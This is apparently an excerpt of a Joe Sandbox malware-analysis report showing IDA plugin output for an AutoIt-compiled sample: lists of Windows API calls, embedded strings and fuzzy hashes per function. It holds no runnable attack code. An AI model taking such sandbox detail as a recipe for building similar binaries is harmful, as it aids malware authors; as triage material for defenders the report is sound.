                                                                    • VariantCopy.OLEAUT32(00000000,?), ref: 01037D68
                                                                    • VariantClear.OLEAUT32(00000000), ref: 01037D74
                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 01037E62
                                                                    • __swprintf.LIBCMT ref: 01037E92
                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 01037EBE
                                                                    • VariantInit.OLEAUT32(?), ref: 01037F6F
                                                                    • SysFreeString.OLEAUT32(00000016), ref: 01038003
                                                                    • VariantClear.OLEAUT32(?), ref: 0103805D
                                                                    • VariantClear.OLEAUT32(?), ref: 0103806C
                                                                    • VariantInit.OLEAUT32(00000000), ref: 010380AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                    • API String ID: 3730832054-3931177956
                                                                    • Opcode ID: e1484e499b55de31952d3add4afc02c521ae96846d497a6bad00ff0b33d458f8
                                                                    • Instruction ID: 926bb2e984307a80336146abc854480af2db0f0f0ac886eb5a37f8cd567a39aa
                                                                    • Opcode Fuzzy Hash: e1484e499b55de31952d3add4afc02c521ae96846d497a6bad00ff0b33d458f8
                                                                    • Instruction Fuzzy Hash: 43D117B1600606EBDF10AF65D848B7EBBF9BF85300F048596F5859B284DF79E840CBA1
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 01054424
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0105446F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharMessageSendUpper
                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                    • API String ID: 3974292440-4258414348
                                                                    • Opcode ID: 9ea3a7c451ddfbf3640690da4c905848e0706026533197ca63b726c51da1cc57
                                                                    • Instruction ID: c19c872abc9495cc1f416a348229cc3a352284f046f6951e319bf30996487a9f
                                                                    • Opcode Fuzzy Hash: 9ea3a7c451ddfbf3640690da4c905848e0706026533197ca63b726c51da1cc57
                                                                    • Instruction Fuzzy Hash: DC919D302047118BCB04FF14C851AAEB7E2AF94754F48485DECD69B3A2DB79EC49DB91
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0105B8B4
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,010591C2), ref: 0105B910
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0105B949
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0105B98C
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0105B9C3
                                                                    • FreeLibrary.KERNEL32(?), ref: 0105B9CF
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0105B9DF
                                                                    • DestroyIcon.USER32(?,?,?,?,?,010591C2), ref: 0105B9EE
                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0105BA0B
                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0105BA17
                                                                      • Part of subcall function 00FF2EFD: __wcsicmp_l.LIBCMT ref: 00FF2F86
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                    • String ID: .dll$.exe$.icl
                                                                    • API String ID: 1212759294-1154884017
                                                                    • Opcode ID: 23a450dd9a02eaaeb38cce6d7046e64b37f8dca615845dfd22f5616634c5e7e8
                                                                    • Instruction ID: 79734d28f541dfb41e2add011ff96ecc38e89ede59d0367f80fc1d5ca70be953
                                                                    • Opcode Fuzzy Hash: 23a450dd9a02eaaeb38cce6d7046e64b37f8dca615845dfd22f5616634c5e7e8
                                                                    • Instruction Fuzzy Hash: B361BC71900219BAEB94DF68CC45BBF7BA9FB08710F10414AFD95D61C1DB79AA80DBA0
                                                                    APIs
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                    • CharLowerBuffW.USER32(?,?), ref: 0103A3CB
                                                                    • GetDriveTypeW.KERNEL32 ref: 0103A418
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0103A460
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0103A497
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0103A4C5
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                    • API String ID: 2698844021-4113822522
                                                                    • Opcode ID: 137ecfa76d71dbf405e6ab5b2a93dccfe4d791f66323523dfe716520e0aeed6d
                                                                    • Instruction ID: 07e0f6905b8aec2ffd0648e2596d41b715c7999856eeccdefdce59934b135892
                                                                    • Opcode Fuzzy Hash: 137ecfa76d71dbf405e6ab5b2a93dccfe4d791f66323523dfe716520e0aeed6d
                                                                    • Instruction Fuzzy Hash: C65139712083059FC700EF25C99186AB7E9EF88718F44885EF8D69B262DB35ED09DB52
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0100E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0102F8DF
                                                                    • LoadStringW.USER32(00000000,?,0100E029,00000001), ref: 0102F8E8
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                    • GetModuleHandleW.KERNEL32(00000000,01095310,?,00000FFF,?,?,0100E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0102F90A
                                                                    • LoadStringW.USER32(00000000,?,0100E029,00000001), ref: 0102F90D
                                                                    • __swprintf.LIBCMT ref: 0102F95D
                                                                    • __swprintf.LIBCMT ref: 0102F96E
                                                                    • _wprintf.LIBCMT ref: 0102FA17
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0102FA2E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                    • API String ID: 984253442-2268648507
                                                                    • Opcode ID: 6af9ba9b5a4f910a65032128788258e04ec03d6144330e93bec7221ebb6da32f
                                                                    • Instruction ID: 5614410358a3894b1f6f95976345a79bc191bbaea077111674967749910e53d8
                                                                    • Opcode Fuzzy Hash: 6af9ba9b5a4f910a65032128788258e04ec03d6144330e93bec7221ebb6da32f
                                                                    • Instruction Fuzzy Hash: E5419F7280421EAACF04FFE0DD86DEEB779AF14340F540056F645BA191EA396F09DB61
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,01059207,?,?), ref: 0105BA56
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BA6D
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BA78
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BA85
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0105BA8E
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BA9D
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0105BAA6
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BAAD
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BABE
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,01062CAC,?), ref: 0105BAD7
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0105BAE7
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0105BB0B
                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0105BB36
                                                                    • DeleteObject.GDI32(00000000), ref: 0105BB5E
                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0105BB74
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                    • String ID:
                                                                    • API String ID: 3840717409-0
                                                                    • Opcode ID: e51108ac123b12b8a8ce4ecc63c623ec59aff2b1f893d084768f2ea9550c3cb1
                                                                    • Instruction ID: ecdfa28aaf714a105a8de844fa02dc7b39b8b8785258f077581693e91e3465f9
                                                                    • Opcode Fuzzy Hash: e51108ac123b12b8a8ce4ecc63c623ec59aff2b1f893d084768f2ea9550c3cb1
                                                                    • Instruction Fuzzy Hash: 00416775600309AFDB619F69DC88EABBBF9FF89711F104058F989D7254C779AA01CB20
                                                                    APIs
                                                                    • __wsplitpath.LIBCMT ref: 0103DA10
                                                                    • _wcscat.LIBCMT ref: 0103DA28
                                                                    • _wcscat.LIBCMT ref: 0103DA3A
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0103DA4F
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0103DA63
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0103DA7B
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0103DA95
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0103DAA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                    • String ID: *.*
                                                                    • API String ID: 34673085-438819550
                                                                    • Opcode ID: d6c987923a5b1657b91cc7c0251398ae427aca553ae3a89110bea46591c1afe4
                                                                    • Instruction ID: 868efb789e188a6b670377d6e9481490799b7163b50b40f19a07d11a83e7b751
                                                                    • Opcode Fuzzy Hash: d6c987923a5b1657b91cc7c0251398ae427aca553ae3a89110bea46591c1afe4
                                                                    • Instruction Fuzzy Hash: 2981AF715082419FCB64EFA8C8409AEB7E9AFC9310F88486EF9C9C7211E734D945CB52
                                                                    APIs
                                                                      • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0105C1FC
                                                                    • GetFocus.USER32 ref: 0105C20C
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0105C217
                                                                    • _memset.LIBCMT ref: 0105C342
                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0105C36D
                                                                    • GetMenuItemCount.USER32(?), ref: 0105C38D
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0105C3A0
                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0105C3D4
                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0105C41C
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0105C454
                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0105C489
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1296962147-4108050209
                                                                    • Opcode ID: be1fdf061d0eb7e68884ca19f1bd3e9318a06c05bbb78ee8717a79727e7cdfb7
                                                                    • Instruction ID: eb47b37130210c1fb59ea71c59fa0cd5cf585056a630537ef58f3f30d2db82c4
                                                                    • Opcode Fuzzy Hash: be1fdf061d0eb7e68884ca19f1bd3e9318a06c05bbb78ee8717a79727e7cdfb7
                                                                    • Instruction Fuzzy Hash: CC819E701083059FE7A1CF18C984A6BBBE8FB88754F00496EFED597292CB75D904CB62
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 0104738F
                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0104739B
                                                                    • CreateCompatibleDC.GDI32(?), ref: 010473A7
                                                                    • SelectObject.GDI32(00000000,?), ref: 010473B4
                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 01047408
                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01047444
                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 01047468
                                                                    • SelectObject.GDI32(00000006,?), ref: 01047470
                                                                    • DeleteObject.GDI32(?), ref: 01047479
                                                                    • DeleteDC.GDI32(00000006), ref: 01047480
                                                                    • ReleaseDC.USER32(00000000,?), ref: 0104748B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                    • String ID: (
                                                                    • API String ID: 2598888154-3887548279
                                                                    • Opcode ID: 48c5ffea9c3ada7645d02b580494afed38ec64b6de200f3a214cc6f3bb391c19
                                                                    • Instruction ID: 7fe0270d2854fd6ae1e533ae3598458725ba839ab098096f4c4c05615c31962a
                                                                    • Opcode Fuzzy Hash: 48c5ffea9c3ada7645d02b580494afed38ec64b6de200f3a214cc6f3bb391c19
                                                                    • Instruction Fuzzy Hash: 7D512BB5900309EFDB25CFA8C885EAFBBB9EF48310F14852DFA9997210D775A940CB50
                                                                    APIs
                                                                      • Part of subcall function 00FF0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FD6B0C,?,00008000), ref: 00FF0973
                                                                      • Part of subcall function 00FD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD4743,?,?,00FD37AE,?), ref: 00FD4770
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FD6BAD
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD6CFA
                                                                      • Part of subcall function 00FD586D: _wcscpy.LIBCMT ref: 00FD58A5
                                                                      • Part of subcall function 00FF363D: _iswctype.LIBCMT ref: 00FF3645
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                    • API String ID: 537147316-1018226102
                                                                    • Opcode ID: d4bf3dbad4fe37a2c8ec623c51027354386a0a40a6c846e4cc91080312afef85
                                                                    • Instruction ID: 025c9271be693580065534449d74cf60228b8b751e85be8234562d30c6718b5c
                                                                    • Opcode Fuzzy Hash: d4bf3dbad4fe37a2c8ec623c51027354386a0a40a6c846e4cc91080312afef85
                                                                    • Instruction Fuzzy Hash: 4902BB311083419FD725EF24C880AAFBBE6BF98314F08481EF5C9972A2DB34D949DB52
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 01032D50
                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 01032DDD
                                                                    • GetMenuItemCount.USER32(01095890), ref: 01032E66
                                                                    • DeleteMenu.USER32(01095890,00000005,00000000,000000F5,?,?), ref: 01032EF6
                                                                    • DeleteMenu.USER32(01095890,00000004,00000000), ref: 01032EFE
                                                                    • DeleteMenu.USER32(01095890,00000006,00000000), ref: 01032F06
                                                                    • DeleteMenu.USER32(01095890,00000003,00000000), ref: 01032F0E
                                                                    • GetMenuItemCount.USER32(01095890), ref: 01032F16
                                                                    • SetMenuItemInfoW.USER32(01095890,00000004,00000000,00000030), ref: 01032F4C
                                                                    • GetCursorPos.USER32(?), ref: 01032F56
                                                                    • SetForegroundWindow.USER32(00000000), ref: 01032F5F
                                                                    • TrackPopupMenuEx.USER32(01095890,00000000,?,00000000,00000000,00000000), ref: 01032F72
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 01032F7E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                    • String ID:
                                                                    • API String ID: 3993528054-0
                                                                    • Opcode ID: 6a1d9cc2f5bdd9f84cd04b80864faa56419f278eb6d621cde65a33febafaa019
                                                                    • Instruction ID: 6d803edb5ea2c453afc63297c110e15d79a075f0615e5ecb57c65bdd5d3f6848
                                                                    • Opcode Fuzzy Hash: 6a1d9cc2f5bdd9f84cd04b80864faa56419f278eb6d621cde65a33febafaa019
                                                                    • Instruction Fuzzy Hash: 4871C570600206BEFB219F58DC49FAABFACFF84754F144256F7A5AA1D0C7756820CBA0
                                                                    APIs
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                    • _memset.LIBCMT ref: 0102786B
                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 010278A0
                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 010278BC
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 010278D8
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 01027902
                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0102792A
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 01027935
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0102793A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                    • API String ID: 1411258926-22481851
                                                                    • Opcode ID: 65c37711702cce5ef6b86dab53f0f11b000d7be3ca14969f6152d200a3444dff
                                                                    • Instruction ID: 1210fdde078dda5925af774e967a90ad4d8c935ca280c63fd76eec79f119e3b0
                                                                    • Opcode Fuzzy Hash: 65c37711702cce5ef6b86dab53f0f11b000d7be3ca14969f6152d200a3444dff
                                                                    • Instruction Fuzzy Hash: 81412872C10229AACF21EBA4DC85DEEB7B9FF14710F44406AF945A7261EB399904DB90
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0104FDAD,?,?), ref: 01050E31
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                    • API String ID: 3964851224-909552448
                                                                    • Opcode ID: d61bc5655e110c49e2555c756a00053cb6d526954fc1a2fa17a7c16bf2c866c8
                                                                    • Instruction ID: 7aafd6793aaf7d0b4e70ae08f83670f75a3d1dd402ff48e68a7fa94e3d7fcf90
